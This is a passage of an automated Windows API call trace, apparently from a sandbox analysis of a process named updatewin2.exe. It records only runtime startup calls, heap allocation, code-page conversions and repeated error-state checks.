lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9b8fbee0, dwHighDateTime=0x1d5d6b4)) [0079.647] GetCurrentProcessId () returned 0x65c [0079.647] GetCurrentThreadId () returned 0x5e0 [0079.647] GetTickCount () returned 0x1159b66 [0079.647] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=22011687731) returned 1 [0079.684] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0079.684] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1f50000 [0079.688] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.688] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0079.689] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0079.689] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0079.689] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0079.689] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.689] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.690] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.690] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.690] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.691] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.691] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.691] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.692] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.692] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.692] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.693] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0079.693] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x214) returned 0x1f507d0 [0079.693] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.693] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0079.694] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0079.694] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0079.694] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0079.694] GetCurrentThreadId () returned 0x5e0 [0079.694] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0079.694] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x8, Size=0x800) returned 0x1f509f0 [0079.695] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0079.695] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0079.695] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0079.695] SetHandleCount (uNumber=0x20) returned 0x20 [0079.695] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe\" " [0079.700] GetEnvironmentStringsW () returned 0x594e70* [0079.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0079.700] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x565) returned 0x1f511f8 [0079.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1f511f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0079.700] FreeEnvironmentStringsW (penv=0x594e70) returned 1 [0079.701] GetLastError () returned 0x0 [0079.701] SetLastError (dwErrCode=0x0) [0079.701] GetLastError () returned 0x0 [0079.701] SetLastError (dwErrCode=0x0) [0079.701] GetLastError () returned 0x0 [0079.701] SetLastError (dwErrCode=0x0) [0079.701] GetACP () returned 0x4e4 [0079.701] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x220) returned 0x1f51768 [0079.701] GetLastError () returned 0x0 [0079.701] SetLastError (dwErrCode=0x0) [0079.701] IsValidCodePage (CodePage=0x4e4) returned 1 [0079.701] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0079.701] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0079.701] GetLastError () returned 0x0 [0079.701] SetLastError (dwErrCode=0x0) [0079.701] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0079.701] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0079.702] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0079.702] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0079.702] GetLastError () returned 0x0 [0079.702] SetLastError (dwErrCode=0x0) [0079.702] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0079.702] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0079.702] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ퐇萎㞅AĀ") returned 256 [0079.702] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ퐇萎㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0079.702] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ퐇萎㞅AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0079.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿн¨\x84\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0079.702] GetLastError () returned 0x0 [0079.702] SetLastError (dwErrCode=0x0) [0079.702] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0079.702] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ퐇萎㞅AĀ") returned 256 [0079.702] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ퐇萎㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0079.702] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ퐇萎㞅AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0079.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿн¨\x84\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0079.849] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43acc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin2.exe")) returned 0x5f [0079.849] GetLastError () returned 0x0 [0079.849] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.850] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.850] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.850] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.850] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.850] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.850] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.850] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.850] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.850] SetLastError (dwErrCode=0x0) [0079.850] GetLastError () returned 0x0 [0079.851] SetLastError (dwErrCode=0x0) [0079.851] GetLastError () returned 0x0 [0079.851] SetLastError (dwErrCode=0x0) [0079.851] GetLastError () returned 0x0 [0079.851] SetLastError (dwErrCode=0x0) [0079.851] GetLastError () returned 0x0 [0079.851] SetLastError (dwErrCode=0x0) [0079.851] GetLastError () returned 0x0 [0079.851] SetLastError (dwErrCode=0x0) [0079.851] GetLastError () returned 0x0 [0079.851] SetLastError (dwErrCode=0x0) [0079.851] GetLastError () returned 0x0 [0079.851] SetLastError (dwErrCode=0x0) [0079.851] GetLastError () returned 0x0 [0079.851] SetLastError (dwErrCode=0x0) [0079.851] GetLastError () returned 0x0 [0079.851] SetLastError (dwErrCode=0x0) [0079.851] GetLastError () returned 0x0 [0079.852] SetLastError (dwErrCode=0x0) [0079.852] GetLastError () returned 0x0 [0079.852] SetLastError (dwErrCode=0x0) [0079.852] GetLastError () returned 0x0 [0079.852] SetLastError (dwErrCode=0x0) [0079.852] GetLastError () returned 0x0 [0079.852] SetLastError (dwErrCode=0x0) [0079.852] GetLastError () returned 0x0 [0079.852] SetLastError (dwErrCode=0x0) [0079.852] GetLastError () returned 0x0 [0079.852] SetLastError (dwErrCode=0x0) [0079.852] GetLastError () returned 0x0 [0079.852] SetLastError (dwErrCode=0x0) [0079.852] GetLastError () returned 0x0 [0079.852] SetLastError (dwErrCode=0x0) [0079.852] GetLastError () returned 0x0 [0079.852] SetLastError (dwErrCode=0x0) [0079.852] GetLastError () returned 0x0 [0079.853] SetLastError (dwErrCode=0x0) [0079.853] GetLastError () returned 0x0 [0079.853] SetLastError (dwErrCode=0x0) [0079.853] GetLastError () returned 0x0 [0079.853] SetLastError (dwErrCode=0x0) [0079.853] GetLastError () returned 0x0 [0079.853] SetLastError (dwErrCode=0x0) [0079.853] GetLastError () returned 0x0 [0079.853] SetLastError (dwErrCode=0x0) [0079.853] GetLastError () returned 0x0 [0079.853] SetLastError (dwErrCode=0x0) [0079.853] GetLastError () returned 0x0 [0079.853] SetLastError (dwErrCode=0x0) [0079.853] GetLastError () returned 0x0 [0079.854] SetLastError (dwErrCode=0x0) [0079.854] GetLastError () returned 0x0 [0079.854] SetLastError (dwErrCode=0x0) [0079.854] GetLastError () returned 0x0 [0079.854] SetLastError (dwErrCode=0x0) [0079.854] GetLastError () returned 0x0 [0079.854] SetLastError (dwErrCode=0x0) [0079.854] GetLastError () returned 0x0 [0079.854] SetLastError (dwErrCode=0x0) [0079.854] GetLastError () returned 0x0 [0079.854] SetLastError (dwErrCode=0x0) [0079.854] GetLastError () returned 0x0 [0079.854] SetLastError (dwErrCode=0x0) [0079.854] GetLastError () returned 0x0 [0079.854] SetLastError (dwErrCode=0x0) [0079.854] GetLastError () returned 0x0 [0079.854] SetLastError (dwErrCode=0x0) [0079.855] GetLastError () returned 0x0 [0079.855] SetLastError (dwErrCode=0x0) [0079.855] GetLastError () returned 0x0 [0079.855] SetLastError (dwErrCode=0x0) [0079.855] GetLastError () returned 0x0 [0079.855] SetLastError (dwErrCode=0x0) [0079.855] GetLastError () returned 0x0 [0079.855] SetLastError (dwErrCode=0x0) [0079.855] GetLastError () returned 0x0 [0079.855] SetLastError (dwErrCode=0x0) [0079.855] GetLastError () returned 0x0 [0079.855] SetLastError (dwErrCode=0x0) [0079.855] GetLastError () returned 0x0 [0079.855] SetLastError (dwErrCode=0x0) [0079.855] GetLastError () returned 0x0 [0079.856] SetLastError (dwErrCode=0x0) [0079.856] GetLastError () returned 0x0 [0079.856] SetLastError (dwErrCode=0x0) [0079.856] GetLastError () returned 0x0 [0079.856] SetLastError (dwErrCode=0x0) [0079.856] GetLastError () returned 0x0 [0079.856] SetLastError (dwErrCode=0x0) [0079.856] GetLastError () returned 0x0 [0079.856] SetLastError (dwErrCode=0x0) [0079.856] GetLastError () returned 0x0 [0079.856] SetLastError (dwErrCode=0x0) [0079.856] GetLastError () returned 0x0 [0079.856] SetLastError (dwErrCode=0x0) [0079.857] GetLastError () returned 0x0 [0079.857] SetLastError (dwErrCode=0x0) [0079.857] GetLastError () returned 0x0 [0079.857] SetLastError (dwErrCode=0x0) [0079.857] GetLastError () returned 0x0 [0079.857] SetLastError (dwErrCode=0x0) [0079.857] GetLastError () returned 0x0 [0079.857] SetLastError (dwErrCode=0x0) [0079.857] GetLastError () returned 0x0 [0079.857] SetLastError 